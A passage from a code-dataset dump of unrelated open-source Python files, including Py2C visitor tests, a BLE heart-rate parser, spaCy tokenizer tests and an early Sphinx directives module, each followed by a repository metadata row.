self.recorded_access_path = self.access_path[:]
class EmptyTransformer(visitors.RecursiveNodeTransformer):
pass
class VisitOrderCheckingTransformer(visitors.RecursiveNodeTransformer):
def __init__(self):
super().__init__()
self.visited = []
def generic_visit(self, node):
self.visited.append(node.__class__.__name__)
return super().generic_visit(node)
def visit_BasicNodeReplacement(self, node):
self.visited.append("visited Copy!")
return node
class AccessPathCheckingTransformer(visitors.RecursiveNodeTransformer):
def __init__(self):
super().__init__()
self.recorded_access_path = None
def visit_BasicNode(self, node):
self.recorded_access_path = self.access_path[:]
return node
class TransformationCheckingTransformer(visitors.RecursiveNodeTransformer):
def visit_BasicNode(self, node):
return BasicNodeReplacement()
def visit_BasicNodeDeletable(self, node):
return None # Delete this node
def visit_BasicNodeReplacement(self, node):
return self.NONE_DEPUTY # Replace this node with None
def visit_BasicNodeWithListReplacement(self, node):
return [BasicNode(), BasicNodeReplacement()]
# -----------------------------------------------------------------------------
# Tests
# -----------------------------------------------------------------------------
class TestRecursiveASTVisitor(Test):
"""py2c.tree.visitors.RecursiveNodeVisitor
"""
context = globals()
@data_driven_test("visitors-visitor_order.yaml", prefix="visit order of ")
def test_visit_order(self, node, order):
to_visit = self.load(node)
# The main stuff
visitor = VisitOrderCheckingVisitor()
retval = visitor.visit(to_visit)
assert_equal(retval, None)
assert_equal(visitor.visited, order)
@data_driven_test("visitors-access_path.yaml", prefix="access path on visit of ")
def test_access_path(self, node, access):
to_visit = self.load(node)
access_path = self.load(access)
# The main stuff
visitor = AccessPathCheckingVisitor()
retval = visitor.visit(to_visit)
assert_equal(retval, None)
assert_equal(visitor.recorded_access_path, access_path)
class TestRecursiveASTTransformer(Test):
"""py2c.tree.visitors.RecursiveNodeTransformer
"""
context = globals()
@data_driven_test("visitors-visitor_order.yaml", prefix="empty transformer does not transform ")
def test_empty_transformer(self, node, order):
to_visit = self.load(node)
# The main stuff
visitor = EmptyTransformer()
retval = visitor.visit(to_visit)
assert_equal(to_visit, retval)
@data_driven_test("visitors-visitor_order.yaml", prefix="visit order of ")
def test_visit_order(self, node, order):
to_visit = self.load(node)
# The main stuff
visitor = VisitOrderCheckingTransformer()
retval = visitor.visit(to_visit)
assert_equal(to_visit, retval)
assert_equal(visitor.visited, order)
@data_driven_test("visitors-access_path.yaml", prefix="access path on visit of ")
def test_access_path(self, node, access):
to_visit = self.load(node)
access_path = self.load(access)
# The main stuff
visitor = AccessPathCheckingTransformer()
retval = visitor.visit(to_visit)
assert_equal(retval, to_visit)
assert_equal(visitor.recorded_access_path, access_path)
@data_driven_test("visitors-transform.yaml", prefix="transformation of ")
def test_transformation(self, node, expected):
to_visit = self.load(node)
expected_node = self.load(expected)
# The main stuff
visitor = TransformationCheckingTransformer()
retval = visitor.visit(to_visit)
assert_equal(retval, expected_node)
if __name__ == '__main__':
from py2c.tests import runmodule
runmodule()
| pradyunsg/Py2C | py2c/tree/tests/test_visitors.py | Python | bsd-3-clause | 5,659 | 0.00053 |
from twilio.twiml.voice_response import VoiceResponse, Say, Sms
response = VoiceResponse()
response.say('Our store is located at 123 Easy St.')
response.sms('Store Location: 123 Easy St.')
print(response)
| TwilioDevEd/api-snippets | twiml/voice/sms/sms-2/sms-2.6.x.py | Python | mit | 207 | 0 |
#!/usr/bin/python
import ble
import uuids
OPCODE_RESET_EXPENDED=1
class HeartRateService(ble.Service):
uuid=uuids.heart_rate
class HeartRateControlPoint(ble.Characteristic):
uuid=uuids.heart_rate_control_point
def reset_expended(self):
opcode = OPCODE_RESET_EXPENDED
self.value = [opcode]
class HeartRateMeasurement(ble.Characteristic):
uuid=uuids.heart_rate_measurement
@property
def value(self):
return self.interpret_raw_hrm_measurement(self.raw)
def interpret_raw_hrm_measurement(self, raw_value):
value = [ord(c) for c in raw_value]
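            # Flags byte of the Heart Rate Measurement characteristic:
            #   bit 0    - heart rate value format (0: uint8, 1: uint16)
            #   bits 1-2 - sensor contact status
            #   bit 3    - energy expended field present
            #   bit 4    - RR-interval fields present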
flags = value.pop(0)
hr_format = (flags>>0) & 1;
contact_status = (flags>>1) & 3;
expended_present = (flags>>3) & 1;
rr_present = (flags>>4) & 1;
meas={}
meas['hr'] = value.pop(0)
if (hr_format):
meas['hr'] += 256*value.pop(0)
if (contact_status & 2):
meas['sensor_contact'] = bool(contact_status & 1)
if expended_present:
e = value.pop(0)
e += 256*value.pop(0)
meas['energy_expended'] = e
if rr_present:
rr = []
while value:
rr_val = value.pop(0)
rr_val += 256*value.pop(0)
rr_val /= 1024.
rr.append(rr_val)
meas['rr'] = rr
return meas
| markrages/ble | profiles/hrm_service.py | Python | mit | 1,438 | 0.013908 |
# coding: utf-8
"""Test that tokenizer exceptions and emoticons are handles correctly."""
from __future__ import unicode_literals
import pytest
@pytest.mark.parametrize('text', ["auf'm", "du's", "über'm", "wir's"])
def test_de_tokenizer_splits_contractions(de_tokenizer, text):
tokens = de_tokenizer(text)
assert len(tokens) == 2
@pytest.mark.parametrize('text', ["z.B.", "d.h.", "Jan.", "Dez.", "Chr."])
def test_de_tokenizer_handles_abbr(de_tokenizer, text):
tokens = de_tokenizer(text)
assert len(tokens) == 1
def test_de_tokenizer_handles_exc_in_text(de_tokenizer):
text = "Ich bin z.Zt. im Urlaub."
tokens = de_tokenizer(text)
assert len(tokens) == 6
assert tokens[2].text == "z.Zt."
assert tokens[2].lemma_ == "zur Zeit"
@pytest.mark.parametrize('text,norms', [("vor'm", ["vor", "dem"]), ("du's", ["du", "es"])])
def test_de_tokenizer_norm_exceptions(de_tokenizer, text, norms):
tokens = de_tokenizer(text)
assert [token.norm_ for token in tokens] == norms
@pytest.mark.xfail
@pytest.mark.parametrize('text,norm', [("daß", "dass")])
def test_de_lex_attrs_norm_exceptions(de_tokenizer, text, norm):
tokens = de_tokenizer(text)
assert tokens[0].norm_ == norm
| recognai/spaCy | spacy/tests/lang/de/test_exceptions.py | Python | mit | 1,230 | 0.000814 |
import asyncio
from mandelbrot.transport import *
class MockTransport(Transport):
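    # Tests are expected to override or patch the mock_* methods below;
    # the coroutine wrappers simply delegate to them.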
def mock_create_item(self, path, item):
raise NotImplementedError()
@asyncio.coroutine
def create_item(self, path, item):
return self.mock_create_item(path, item)
def mock_replace_item(self, path, item):
raise NotImplementedError()
@asyncio.coroutine
def replace_item(self, path, item):
return self.mock_replace_item(path, item)
def mock_delete_item(self, path):
raise NotImplementedError()
@asyncio.coroutine
def delete_item(self, path):
return self.mock_delete_item(path)
def mock_get_item(self, path, filters):
raise NotImplementedError()
@asyncio.coroutine
def get_item(self, path, filters):
return self.mock_get_item(path, filters)
def mock_patch_item(self, path, fields, constraints):
raise NotImplementedError()
@asyncio.coroutine
def patch_item(self, path, fields, constraints):
return self.mock_patch_item(path, fields, constraints)
def mock_get_collection(self, path, matchers, count, last):
raise NotImplementedError()
@asyncio.coroutine
def get_collection(self, path, matchers, count, last):
return self.mock_get_collection(path, matchers, count, last)
def mock_delete_collection(self, path, params):
raise NotImplementedError()
@asyncio.coroutine
def delete_collection(self, path, params):
return self.mock_delete_collection(path, params)
| msfrank/mandelbrot | test/mock_transport.py | Python | gpl-3.0 | 1,546 | 0.000647 |
from collections import OrderedDict
from datetime import datetime
from skylines.api import schemas
def test_user_schema(test_user):
""":type test_user: skylines.model.User"""
data, errors = schemas.user_schema.dump(test_user)
assert not errors
assert isinstance(data, OrderedDict)
assert data.keys() == [
'id',
'name',
'first_name',
'last_name',
'club',
'tracking_delay',
'tracking_call_sign',
'created_at'
]
assert data['id'] == test_user.id
assert data['name'] == test_user.name
assert data['first_name'] == test_user.first_name
assert data['last_name'] == test_user.last_name
assert data['tracking_delay'] == test_user.tracking_delay
assert data['tracking_call_sign'] == test_user.tracking_callsign
created_at = datetime.strptime(data['created_at'], '%Y-%m-%dT%H:%M:%S.%f+00:00')
assert isinstance(created_at, datetime)
assert created_at == test_user.created
def test_user_list_schema(test_user):
""":type test_user: skylines.model.User"""
data, errors = schemas.user_list_schema.dump(test_user)
assert not errors
assert isinstance(data, OrderedDict)
assert data.keys() == [
'id',
'name',
'first_name',
'last_name',
]
assert data['id'] == test_user.id
assert data['name'] == test_user.name
assert data['first_name'] == test_user.first_name
assert data['last_name'] == test_user.last_name
def test_current_user_schema(test_user):
""":type test_user: skylines.model.User"""
data, errors = schemas.current_user_schema.dump(test_user)
assert not errors
assert isinstance(data, OrderedDict)
assert data.keys() == [
'id',
'name',
'first_name',
'last_name',
'club',
'tracking_delay',
'tracking_call_sign',
'created_at',
'email',
'tracking_key',
'admin',
]
assert data['id'] == test_user.id
assert data['name'] == test_user.name
assert data['first_name'] == test_user.first_name
assert data['last_name'] == test_user.last_name
assert data['email'] == test_user.email_address
assert data['tracking_key'] == ('%X' % test_user.tracking_key)
assert data['tracking_delay'] == test_user.tracking_delay
assert data['tracking_call_sign'] == test_user.tracking_callsign
created_at = datetime.strptime(data['created_at'], '%Y-%m-%dT%H:%M:%S.%f+00:00')
assert isinstance(created_at, datetime)
assert created_at == test_user.created
| kerel-fs/skylines | tests/api/schemas/user_test.py | Python | agpl-3.0 | 2,586 | 0.000773 |
"""Plot implied timescales vs lagtime
{{header}}
"""
# ? include "plot_header.template"
# ? from "plot_macros.template" import xdg_open with context
import numpy as np
import pandas as pd
import seaborn as sns
from matplotlib import pyplot as plt
sns.set_style('ticks')
colors = sns.color_palette()
## Load
timescales = pd.read_pickle('timescales.pandas.pickl')
n_timescales = len([x for x in timescales.columns
if x.startswith('timescale_')])
## Implied timescales vs lagtime
def plot_timescales(ax):
for i in range(n_timescales):
ax.scatter(timescales['lag_time'],
timescales['timescale_{}'.format(i)],
s=50, c=colors[0],
label=None, # pandas be interfering
)
xmin, xmax = ax.get_xlim()
xx = np.linspace(xmin, xmax)
ax.plot(xx, xx, color=colors[2], label='$y=x$')
ax.legend(loc='best', fontsize=14)
ax.set_xlabel('Lag Time / todo:units', fontsize=18)
ax.set_ylabel('Implied Timescales / todo:units', fontsize=18)
ax.set_xscale('log')
ax.set_yscale('log')
## Percent trimmed vs lagtime
def plot_trimmed(ax):
ax.plot(timescales['lag_time'],
timescales['percent_retained'],
'o-',
label=None, # pandas be interfering
)
ax.axhline(100, color='k', ls='--', label='100%')
ax.legend(loc='best', fontsize=14)
ax.set_xlabel('Lag Time / todo:units', fontsize=18)
ax.set_ylabel('Retained / %', fontsize=18)
ax.set_xscale('log')
ax.set_ylim((0, 110))
## Plot timescales
fig, ax = plt.subplots(figsize=(7, 5))
plot_timescales(ax)
fig.tight_layout()
fig.savefig('implied-timescales.pdf')
# {{xdg_open('implied-timescales.pdf')}}
## Plot trimmed
fig, ax = plt.subplots(figsize=(7,5))
plot_trimmed(ax)
fig.tight_layout()
fig.savefig('percent-trimmed.pdf')
# {{xdg_open('percent-trimmed.pdf')}}
| msultan/msmbuilder | msmbuilder/project_templates/msm/timescales-plot.py | Python | lgpl-2.1 | 1,908 | 0.004193 |
# -*- coding: utf-8 -*-
"""
sphinx.directives
~~~~~~~~~~~~~~~~~
Handlers for additional ReST directives.
:copyright: 2007-2008 by Georg Brandl.
:license: BSD.
"""
import re
import sys
import string
import posixpath
from os import path
from docutils import nodes
from docutils.parsers.rst import directives
from sphinx import addnodes
from sphinx.roles import caption_ref_re
from sphinx.util.compat import make_admonition
ws_re = re.compile(r'\s+')
# ------ index markup --------------------------------------------------------------
entrytypes = [
'single', 'pair', 'triple', 'module', 'keyword', 'operator',
'object', 'exception', 'statement', 'builtin',
]
def index_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
arguments = arguments[0].split('\n')
env = state.document.settings.env
targetid = 'index-%s' % env.index_num
env.index_num += 1
targetnode = nodes.target('', '', ids=[targetid])
state.document.note_explicit_target(targetnode)
indexnode = addnodes.index()
indexnode['entries'] = ne = []
for entry in arguments:
entry = entry.strip()
for type in entrytypes:
if entry.startswith(type+':'):
value = entry[len(type)+1:].strip()
env.note_index_entry(type, value, targetid, value)
ne.append((type, value, targetid, value))
break
# shorthand notation for single entries
else:
for value in entry.split(','):
env.note_index_entry('single', value.strip(), targetid, value.strip())
ne.append(('single', value.strip(), targetid, value.strip()))
return [indexnode, targetnode]
index_directive.arguments = (1, 0, 1)
directives.register_directive('index', index_directive)
# ------ information units ---------------------------------------------------------
def desc_index_text(desctype, currmodule, name):
if desctype == 'function':
if not currmodule:
return '%s() (built-in function)' % name
return '%s() (in module %s)' % (name, currmodule)
elif desctype == 'data':
if not currmodule:
return '%s (built-in variable)' % name
return '%s (in module %s)' % (name, currmodule)
elif desctype == 'class':
return '%s (class in %s)' % (name, currmodule)
elif desctype == 'exception':
return name
elif desctype == 'method':
try:
clsname, methname = name.rsplit('.', 1)
        except ValueError:
if currmodule:
return '%s() (in module %s)' % (name, currmodule)
else:
return '%s()' % name
if currmodule:
return '%s() (%s.%s method)' % (methname, currmodule, clsname)
else:
return '%s() (%s method)' % (methname, clsname)
elif desctype == 'attribute':
try:
clsname, attrname = name.rsplit('.', 1)
        except ValueError:
if currmodule:
return '%s (in module %s)' % (name, currmodule)
else:
return name
if currmodule:
return '%s (%s.%s attribute)' % (attrname, currmodule, clsname)
else:
return '%s (%s attribute)' % (attrname, clsname)
elif desctype == 'opcode':
return '%s (opcode)' % name
elif desctype == 'cfunction':
return '%s (C function)' % name
elif desctype == 'cmember':
return '%s (C member)' % name
elif desctype == 'cmacro':
return '%s (C macro)' % name
elif desctype == 'ctype':
return '%s (C type)' % name
elif desctype == 'cvar':
return '%s (C variable)' % name
else:
raise ValueError("unhandled descenv: %s" % desctype)
# ------ functions to parse a Python or C signature and create desc_* nodes.
py_sig_re = re.compile(r'''^([\w.]*\.)? # class names
(\w+) \s* # thing name
(?: \((.*)\) )? $ # optionally arguments
''', re.VERBOSE)
py_paramlist_re = re.compile(r'([\[\],])') # split at '[', ']' and ','
def parse_py_signature(signode, sig, desctype, env):
"""
Transform a python signature into RST nodes.
Return (fully qualified name of the thing, classname if any).
If inside a class, the current class name is handled intelligently:
* it is stripped from the displayed name if present
* it is added to the full name (return value) if not present
"""
m = py_sig_re.match(sig)
if m is None: raise ValueError
classname, name, arglist = m.groups()
add_module = True
if env.currclass:
if classname and classname.startswith(env.currclass):
fullname = classname + name
# class name is given again in the signature
classname = classname[len(env.currclass):].lstrip('.')
add_module = False
elif classname:
# class name is given in the signature, but different
fullname = env.currclass + '.' + classname + name
else:
# class name is not given in the signature
fullname = env.currclass + '.' + name
add_module = False
else:
fullname = classname and classname + name or name
if classname:
signode += addnodes.desc_classname(classname, classname)
# exceptions are a special case, since they are documented in the
# 'exceptions' module.
elif add_module and env.config.add_module_names and \
env.currmodule and env.currmodule != 'exceptions':
nodetext = env.currmodule + '.'
signode += addnodes.desc_classname(nodetext, nodetext)
signode += addnodes.desc_name(name, name)
if not arglist:
if desctype in ('function', 'method'):
# for callables, add an empty parameter list
signode += addnodes.desc_parameterlist()
return fullname, classname
signode += addnodes.desc_parameterlist()
stack = [signode[-1]]
for token in py_paramlist_re.split(arglist):
if token == '[':
opt = addnodes.desc_optional()
stack[-1] += opt
stack.append(opt)
elif token == ']':
try: stack.pop()
except IndexError: raise ValueError
elif not token or token == ',' or token.isspace():
pass
else:
token = token.strip()
stack[-1] += addnodes.desc_parameter(token, token)
if len(stack) != 1: raise ValueError
return fullname, classname
c_sig_re = re.compile(
r'''^([^(]*?) # return type
([\w:]+) \s* # thing name (colon allowed for C++ class names)
(?: \((.*)\) )? $ # optionally arguments
''', re.VERBOSE)
c_funcptr_sig_re = re.compile(
r'''^([^(]+?) # return type
(\( [^()]+ \)) \s* # name in parentheses
\( (.*) \) $ # arguments
''', re.VERBOSE)
c_funcptr_name_re = re.compile(r'^\(\s*\*\s*(.*?)\s*\)$')
# RE to split at word boundaries
wsplit_re = re.compile(r'(\W+)')
# These C types aren't described in the reference, so don't try to create
# a cross-reference to them
stopwords = set(('const', 'void', 'char', 'int', 'long', 'FILE', 'struct'))
def parse_c_type(node, ctype):
# add cross-ref nodes for all words
for part in filter(None, wsplit_re.split(ctype)):
tnode = nodes.Text(part, part)
if part[0] in string.letters+'_' and part not in stopwords:
pnode = addnodes.pending_xref(
'', reftype='ctype', reftarget=part, modname=None, classname=None)
pnode += tnode
node += pnode
else:
node += tnode
def parse_c_signature(signode, sig, desctype):
"""Transform a C (or C++) signature into RST nodes."""
# first try the function pointer signature regex, it's more specific
m = c_funcptr_sig_re.match(sig)
if m is None:
m = c_sig_re.match(sig)
if m is None:
raise ValueError('no match')
rettype, name, arglist = m.groups()
signode += addnodes.desc_type("", "")
parse_c_type(signode[-1], rettype)
signode += addnodes.desc_name(name, name)
# clean up parentheses from canonical name
m = c_funcptr_name_re.match(name)
if m:
name = m.group(1)
if not arglist:
if desctype == 'cfunction':
# for functions, add an empty parameter list
signode += addnodes.desc_parameterlist()
return name
paramlist = addnodes.desc_parameterlist()
arglist = arglist.replace('`', '').replace('\\ ', '') # remove markup
# this messes up function pointer types, but not too badly ;)
args = arglist.split(',')
for arg in args:
arg = arg.strip()
param = addnodes.desc_parameter('', '', noemph=True)
try:
ctype, argname = arg.rsplit(' ', 1)
except ValueError:
# no argument name given, only the type
parse_c_type(param, arg)
else:
parse_c_type(param, ctype)
param += nodes.emphasis(' '+argname, ' '+argname)
paramlist += param
signode += paramlist
return name
opcode_sig_re = re.compile(r'(\w+(?:\+\d)?)\s*\((.*)\)')
def parse_opcode_signature(signode, sig):
"""Transform an opcode signature into RST nodes."""
m = opcode_sig_re.match(sig)
if m is None: raise ValueError
opname, arglist = m.groups()
signode += addnodes.desc_name(opname, opname)
paramlist = addnodes.desc_parameterlist()
signode += paramlist
paramlist += addnodes.desc_parameter(arglist, arglist)
return opname.strip()
option_desc_re = re.compile(
r'(/|-|--)([-_a-zA-Z0-9]+)(\s*.*?)(?=,\s+(?:/|-|--)|$)')
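# splits e.g. "-f FILE, --file=FILE" into option descriptions rendered as "-f FILE" and "--file=FILE"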
def parse_option_desc(signode, sig):
"""Transform an option description into RST nodes."""
count = 0
firstname = ''
for m in option_desc_re.finditer(sig):
prefix, optname, args = m.groups()
if count:
signode += addnodes.desc_classname(', ', ', ')
signode += addnodes.desc_name(prefix+optname, prefix+optname)
signode += addnodes.desc_classname(args, args)
if not count:
firstname = optname
count += 1
if not firstname:
raise ValueError
return firstname
def desc_directive(desctype, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
env = state.document.settings.env
node = addnodes.desc()
node['desctype'] = desctype
noindex = ('noindex' in options)
node['noindex'] = noindex
# remove backslashes to support (dummy) escapes; helps Vim's highlighting
signatures = map(lambda s: s.strip().replace('\\', ''), arguments[0].split('\n'))
names = []
clsname = None
for i, sig in enumerate(signatures):
# add a signature node for each signature in the current unit
# and add a reference target for it
sig = sig.strip()
signode = addnodes.desc_signature(sig, '')
signode['first'] = False
node.append(signode)
try:
if desctype in ('function', 'data', 'class', 'exception',
'method', 'attribute'):
name, clsname = parse_py_signature(signode, sig, desctype, env)
elif desctype in ('cfunction', 'cmember', 'cmacro', 'ctype', 'cvar'):
name = parse_c_signature(signode, sig, desctype)
elif desctype == 'opcode':
name = parse_opcode_signature(signode, sig)
elif desctype == 'cmdoption':
optname = parse_option_desc(signode, sig)
if not noindex:
targetname = 'cmdoption-' + optname
signode['ids'].append(targetname)
state.document.note_explicit_target(signode)
env.note_index_entry('pair', 'command line option; %s' % sig,
targetname, targetname)
env.note_reftarget('option', optname, targetname)
continue
elif desctype == 'describe':
signode.clear()
signode += addnodes.desc_name(sig, sig)
continue
else:
# another registered generic x-ref directive
rolename, indextemplate, parse_node = additional_xref_types[desctype]
if parse_node:
fullname = parse_node(env, sig, signode)
else:
signode.clear()
signode += addnodes.desc_name(sig, sig)
# normalize whitespace like xfileref_role does
fullname = ws_re.sub('', sig)
if not noindex:
targetname = '%s-%s' % (rolename, fullname)
signode['ids'].append(targetname)
state.document.note_explicit_target(signode)
if indextemplate:
indexentry = indextemplate % (fullname,)
indextype = 'single'
colon = indexentry.find(':')
if colon != -1:
indextype = indexentry[:colon].strip()
indexentry = indexentry[colon+1:].strip()
env.note_index_entry(indextype, indexentry,
targetname, targetname)
env.note_reftarget(rolename, fullname, targetname)
# don't use object indexing below
continue
except ValueError, err:
# signature parsing failed
signode.clear()
signode += addnodes.desc_name(sig, sig)
continue # we don't want an index entry here
# only add target and index entry if this is the first description of the
# function name in this desc block
if not noindex and name not in names:
fullname = (env.currmodule and env.currmodule + '.' or '') + name
# note target
if fullname not in state.document.ids:
signode['names'].append(fullname)
signode['ids'].append(fullname)
signode['first'] = (not names)
state.document.note_explicit_target(signode)
env.note_descref(fullname, desctype, lineno)
names.append(name)
env.note_index_entry('single',
desc_index_text(desctype, env.currmodule, name),
fullname, fullname)
subnode = addnodes.desc_content()
# needed for automatic qualification of members
clsname_set = False
if desctype in ('class', 'exception') and names:
env.currclass = names[0]
clsname_set = True
elif desctype in ('method', 'attribute') and clsname and not env.currclass:
env.currclass = clsname.strip('.')
clsname_set = True
# needed for association of version{added,changed} directives
if names:
env.currdesc = names[0]
state.nested_parse(content, content_offset, subnode)
if clsname_set:
env.currclass = None
env.currdesc = None
node.append(subnode)
return [node]
desc_directive.content = 1
desc_directive.arguments = (1, 0, 1)
desc_directive.options = {'noindex': directives.flag}
desctypes = [
# the Python ones
'function',
'data',
'class',
'method',
'attribute',
'exception',
# the C ones
'cfunction',
'cmember',
'cmacro',
'ctype',
'cvar',
# the odd one
'opcode',
# for command line options
'cmdoption',
# the generic one
'describe',
'envvar',
]
for _name in desctypes:
directives.register_directive(_name, desc_directive)
# Generic cross-reference types; they can be registered in the application;
# the directives are either desc_directive or target_directive
additional_xref_types = {
# directive name: (role name, index text, function to parse the desc node)
'envvar': ('envvar', 'environment variable; %s', None),
}
# ------ target --------------------------------------------------------------------
def target_directive(targettype, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
"""Generic target for user-defined cross-reference types."""
env = state.document.settings.env
rolename, indextemplate, _ = additional_xref_types[targettype]
# normalize whitespace in fullname like xfileref_role does
fullname = ws_re.sub('', arguments[0].strip())
targetname = '%s-%s' % (rolename, fullname)
node = nodes.target('', '', ids=[targetname])
state.document.note_explicit_target(node)
if indextemplate:
indexentry = indextemplate % (fullname,)
indextype = 'single'
colon = indexentry.find(':')
if colon != -1:
indextype = indexentry[:colon].strip()
indexentry = indexentry[colon+1:].strip()
env.note_index_entry(indextype, indexentry, targetname, targetname)
env.note_reftarget(rolename, fullname, targetname)
return [node]
target_directive.content = 0
target_directive.arguments = (1, 0, 1)
# ------ versionadded/versionchanged -----------------------------------------------
def version_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
node = addnodes.versionmodified()
node['type'] = name
node['version'] = arguments[0]
if len(arguments) == 2:
inodes, messages = state.inline_text(arguments[1], lineno+1)
node.extend(inodes)
if content:
state.nested_parse(content, content_offset, node)
ret = [node] + messages
else:
ret = [node]
env = state.document.settings.env
env.note_versionchange(node['type'], node['version'], node, lineno)
return ret
version_directive.arguments = (1, 1, 1)
version_directive.content = 1
directives.register_directive('deprecated', version_directive)
directives.register_directive('versionadded', version_directive)
directives.register_directive('versionchanged', version_directive)
# ------ see also ------------------------------------------------------------------
def seealso_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
rv = make_admonition(
addnodes.seealso, name, ['See also'], options, content,
lineno, content_offset, block_text, state, state_machine)
return rv
seealso_directive.content = 1
seealso_directive.arguments = (0, 0, 0)
directives.register_directive('seealso', seealso_directive)
# ------ production list (for the reference) ---------------------------------------
token_re = re.compile('`([a-z_]+)`')
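# matches backquoted grammar token names such as `expression`; token_xrefs turns each into a pending_xref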
def token_xrefs(text, env):
retnodes = []
pos = 0
for m in token_re.finditer(text):
if m.start() > pos:
txt = text[pos:m.start()]
retnodes.append(nodes.Text(txt, txt))
refnode = addnodes.pending_xref(m.group(1))
refnode['reftype'] = 'token'
refnode['reftarget'] = m.group(1)
refnode['modname'] = env.currmodule
refnode['classname'] = env.currclass
refnode += nodes.literal(m.group(1), m.group(1), classes=['xref'])
retnodes.append(refnode)
pos = m.end()
if pos < len(text):
retnodes.append(nodes.Text(text[pos:], text[pos:]))
return retnodes
def productionlist_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
env = state.document.settings.env
node = addnodes.productionlist()
messages = []
i = 0
for rule in arguments[0].split('\n'):
if i == 0 and ':' not in rule:
# production group
continue
i += 1
try:
name, tokens = rule.split(':', 1)
except ValueError:
break
subnode = addnodes.production()
subnode['tokenname'] = name.strip()
if subnode['tokenname']:
idname = 'grammar-token-%s' % subnode['tokenname']
if idname not in state.document.ids:
subnode['ids'].append(idname)
state.document.note_implicit_target(subnode, subnode)
env.note_reftarget('token', subnode['tokenname'], idname)
subnode.extend(token_xrefs(tokens, env))
node.append(subnode)
return [node] + messages
productionlist_directive.content = 0
productionlist_directive.arguments = (1, 0, 1)
directives.register_directive('productionlist', productionlist_directive)
# ------ section metadata ----------------------------------------------------------
def module_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
env = state.document.settings.env
modname = arguments[0].strip()
env.currmodule = modname
env.note_module(modname, options.get('synopsis', ''),
options.get('platform', ''),
'deprecated' in options)
modulenode = addnodes.module()
modulenode['modname'] = modname
modulenode['synopsis'] = options.get('synopsis', '')
targetnode = nodes.target('', '', ids=['module-' + modname])
state.document.note_explicit_target(targetnode)
ret = [modulenode, targetnode]
if 'platform' in options:
modulenode['platform'] = options['platform']
node = nodes.paragraph()
node += nodes.emphasis('Platforms: ', 'Platforms: ')
node += nodes.Text(options['platform'], options['platform'])
ret.append(node)
# the synopsis isn't printed; in fact, it is only used in the modindex currently
env.note_index_entry('single', '%s (module)' % modname, 'module-' + modname,
modname)
return ret
module_directive.arguments = (1, 0, 0)
module_directive.options = {'platform': lambda x: x,
'synopsis': lambda x: x,
'deprecated': directives.flag}
directives.register_directive('module', module_directive)
def currentmodule_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
# This directive is just to tell people that we're documenting
# stuff in module foo, but links to module foo won't lead here.
env = state.document.settings.env
modname = arguments[0].strip()
env.currmodule = modname
return []
currentmodule_directive.arguments = (1, 0, 0)
directives.register_directive('currentmodule', currentmodule_directive)
def author_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
# Show authors only if the show_authors option is on
env = state.document.settings.env
if not env.config.show_authors:
return []
para = nodes.paragraph()
emph = nodes.emphasis()
para += emph
if name == 'sectionauthor':
text = 'Section author: '
elif name == 'moduleauthor':
text = 'Module author: '
else:
text = 'Author: '
emph += nodes.Text(text, text)
inodes, messages = state.inline_text(arguments[0], lineno)
emph.extend(inodes)
return [para] + messages
author_directive.arguments = (1, 0, 1)
directives.register_directive('sectionauthor', author_directive)
directives.register_directive('moduleauthor', author_directive)
# ------ toctree directive ---------------------------------------------------------
def toctree_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
env = state.document.settings.env
suffix = env.config.source_suffix
dirname = posixpath.dirname(env.docname)
ret = []
subnode = addnodes.toctree()
includefiles = []
includetitles = {}
for docname in content:
if not docname:
continue
# look for explicit titles and documents ("Some Title <document>").
m = caption_ref_re.match(docname)
if m:
docname = m.group(2)
includetitles[docname] = m.group(1)
# absolutize filenames, remove suffixes
if docname.endswith(suffix):
docname = docname[:-len(suffix)]
docname = posixpath.normpath(posixpath.join(dirname, docname))
if docname not in env.found_docs:
ret.append(state.document.reporter.warning(
'toctree references unknown document %r' % docname, line=lineno))
else:
includefiles.append(docname)
subnode['includefiles'] = includefiles
subnode['includetitles'] = includetitles
subnode['maxdepth'] = options.get('maxdepth', -1)
ret.append(subnode)
return ret
toctree_directive.content = 1
toctree_directive.options = {'maxdepth': int}
directives.register_directive('toctree', toctree_directive)
# ------ centered directive ---------------------------------------------------------
def centered_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
if not arguments:
return []
subnode = addnodes.centered()
inodes, messages = state.inline_text(arguments[0], lineno)
subnode.extend(inodes)
return [subnode] + messages
centered_directive.arguments = (1, 0, 1)
directives.register_directive('centered', centered_directive)
# ------ highlight directive --------------------------------------------------------
def highlightlang_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
if 'linenothreshold' in options:
try:
linenothreshold = int(options['linenothreshold'])
except Exception:
linenothreshold = 10
else:
linenothreshold = sys.maxint
return [addnodes.highlightlang(lang=arguments[0].strip(),
linenothreshold=linenothreshold)]
highlightlang_directive.content = 0
highlightlang_directive.arguments = (1, 0, 0)
highlightlang_directive.options = {'linenothreshold': directives.unchanged}
directives.register_directive('highlight', highlightlang_directive)
directives.register_directive('highlightlang', highlightlang_directive) # old name
# ------ code-block directive -------------------------------------------------------
def codeblock_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
code = u'\n'.join(content)
literal = nodes.literal_block(code, code)
literal['language'] = arguments[0]
literal['linenos'] = 'linenos' in options
return [literal]
codeblock_directive.content = 1
codeblock_directive.arguments = (1, 0, 0)
codeblock_directive.options = {'linenos': directives.flag}
directives.register_directive('code-block', codeblock_directive)
directives.register_directive('sourcecode', codeblock_directive)
# ------ literalinclude directive ---------------------------------------------------
def literalinclude_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
"""Like .. include:: :literal:, but only warns if the include file is not found."""
if not state.document.settings.file_insertion_enabled:
return [state.document.reporter.warning('File insertion disabled', line=lineno)]
env = state.document.settings.env
rel_fn = arguments[0]
source_dir = path.dirname(path.abspath(state_machine.input_lines.source(
lineno - state_machine.input_offset - 1)))
fn = path.normpath(path.join(source_dir, rel_fn))
try:
f = open(fn)
text = f.read()
f.close()
except (IOError, OSError):
retnode = state.document.reporter.warning(
'Include file %r not found or reading it failed' % arguments[0], line=lineno)
else:
